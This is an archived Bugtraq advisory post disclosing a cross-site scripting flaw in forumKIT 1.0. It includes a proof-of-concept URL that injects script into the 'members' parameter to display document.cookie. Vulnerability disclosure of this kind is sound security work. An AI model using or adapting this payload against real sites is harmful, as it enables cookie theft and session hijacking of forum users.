XSS Vulnerability in ForumKIT

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS Vulnerability in ForumKIT
From: tom cruise <the.n3t@xxxxxxxxx>
Date: 13 Jan 2005 11:17:00 -0000


Vulnerable System :
forumKIT 1.0

Description : 
an XSS is founded in the variable members that have the value 'true'
you can exchange it with XSS Code .

exploit : 
http://forum.target.com/f.aspx?members=";>&lt;script&gt;alert(document.cookie);&lt;/script&gt;

this exploit is discovered by : neO
e-mail : al_modamer@xxxxxxxxxxx

Prev by Date: [CLA-2005:916] Conectiva Security Announcement - ethereal
Next by Date: [SECURITY] [DSA 637-1] New exim-tls packages fix arbitrary code execution
Previous by thread: [CLA-2005:916] Conectiva Security Announcement - ethereal
Next by thread: [SECURITY] [DSA 637-1] New exim-tls packages fix arbitrary code execution
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux